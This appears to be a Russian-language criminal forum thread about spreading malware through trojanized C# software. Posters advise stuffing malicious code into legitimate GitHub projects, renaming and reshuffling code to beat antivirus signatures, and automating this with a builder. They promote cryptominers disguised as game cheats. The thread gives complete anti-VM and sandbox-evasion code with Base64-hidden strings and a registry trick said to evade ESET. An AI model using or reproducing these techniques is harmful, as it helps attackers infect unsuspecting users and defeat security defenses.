а ну да) но если по примеру следовать, у него в коде прописано по кнопке clsButtonGreen1_Click . так что тебе нужна это кнопка
Все так, еще добавлю что можно с гитхаба брать реально рабочий софт на c# туда пихать свой код с вирем по этой теме компилить и пропихивать. Так еще меньше детектов и палева.по детектам смотрите.
статью ведь аверы тоже читают )), поэтому.
берете делаете новый проект. в другой директории даже.
название проекта рандомно.
именна классов, неймспейсов, функций, переменных, меняете.
если чтото можно переставить в коде, тоже меняете.
добавьте функциональный код, белый, сортировку какуюнибудь.
вот и весь детект на шарпе.
чтобы это автоматизировать, нужно написать билдер, чтобы это делал автоматом, можно даже ИИ подключить, и попарсить гитхаб тотже.
и да. 19я студия сливает что нужно себе., делаейтся оффлайн проекты.
збс ниша конечно майнер под видом читов. прогрузов море а доход так себе я скажу. Но инсталлов за то шик. Так что если надо схему проверить читы + майнер самое то.Да и не только из гитхаба. Как я раньше писал - исходников в сети масса. Главное определится с направлением распространения. То есть - игровуха - соответственно читы и тд. Форекс - анализаторы, советники и тд. Вебмастера - это вообще поле непаханное, софта там востребовано куча
мм? о_0 куда?и да. 19я студия сливает что нужно себе., делаейтся оффлайн проекты.
using System;
using System.Linq;
using System.Management;
using System.Runtime.InteropServices;
using System.Text;
namespace ViSt
{
class VMdetect
{
public static void Runvmdetect()
{
if (DetectVirtualMachine())
Quit();
}
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string running);
public static string CreateASCIIStr(string value) =>
Encoding.ASCII.GetString(Convert.FromBase64String(value));
public static bool DetectVirtualMachine()
{
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
{
using (var items = searcher.Get())
{
foreach (var item in items)
{
string manufacturer = item["Manufacturer"].ToString().ToLower();
if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL"))
|| manufacturer.Contains(CreateASCIIStr("dm13YXJl"))
|| item["Model"].ToString() == CreateASCIIStr("VmlydHVhbEJveA==") || GetModuleHandle("cmdvrt32.dll").ToInt32() != 0 || GetModuleHandle("SxIn.dll").ToInt32() != 0
|| GetModuleHandle("SbieDll.dll").ToInt32() != 0 || GetModuleHandle("Sf2.dll").ToInt32() != 0 ||
GetModuleHandle("snxhk.dll").ToInt32() != 0)
{
return true;
}
var hypervisorPresentProperty
= item.Properties
.OfType<PropertyData>()
.FirstOrDefault(p => p.Name == "HypervisorPresent");
if ((bool?)hypervisorPresentProperty?.Value == true)
{
return true;
}
}
}
}
return false;
}
public static void Quit()
{
Environment.Exit(0);
}
}
}
мм? о_0 куда?
Да это всегда и везде, уже можно хер забивать. Я сколько не блочу трафик в своей винде все равно какая то шляпа стучит на мелко софт. Уже наверное более 1000 хостов лично в баню внес. Все равно стучит.хз куда. в мелкософт видимо.
мне вообще продукты последнии настрораживают.
да качественные и тд. НО
качал я как то Visual Studio Code, кросплатформенный который.
так я замучился отрубать там телеметрию, непонятные апдйты, потоянно лезет в нет и паказывает окна, своей жизьнью живет.
а мне всего лишь нужен был редактор норм.
никчему не призываю, т.к. доказательной базы нет.
мое ИХМО
rkey = rkey.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced");
Потому что иначе палит Eset.Зачем ты создаёшь этот ключ реестра? Такой ключ уже существует, OpenSubKey, нет?
А тебя не смущает то, что в любом случае ключ откроется, а не создастся? И вызван будет тот-же OpenSubKey.Потому что иначе палит Eset.
Вообще не смущает потому что это одно и тоже но Eset видит это иначе, на что закрывает глаза если ключ переопределить самому.А тебя не смущает то, что в любом случае ключ откроется, а не создастся? И вызван будет тот-же OpenSubKey.
Бред какой-то. Это невозможно чисто по логике, действие происходит одно и то же. А если ты про скантайм - то земля пухом.Вообще не смущает потому что это одно и тоже но Eset видит это иначе, на что закрывает глаза если ключ переопределить самому.
Действие одно код другой, да я про скантайм. все по полкам что бы не было проблем. или ты думаешь что контингент статьи будет как то криптовать или прятать код? Если ты шаришь тебе же лучше. Сделай так как считаешь нужным.Бред какой-то. Это невозможно чисто по логике, действие происходит одно и то же. А если ты про скантайм - то земля пухом.
Тогда наворачивается вопрос. Зачем говнокодить, если всё равно без крипта подобное лить никто не будет никуда?Действие одно код другой, да я про скантайм. все по полкам что бы не было проблем. или ты думаешь что контингент статьи будет как то криптовать или прятать код? Если ты шаришь тебе же лучше. Сделай так как считаешь нужным.
На твой вопрос пусть ответят те кто прочитал статью целиком и полностью, включая посты выше которые ты видимо не увидел и делают то что описано в ней. Я же умываю руки раз не дошло до тебя.Тогда наворачивается вопрос. Зачем говнокодить, если всё равно без крипта подобное лить никто не будет никуда?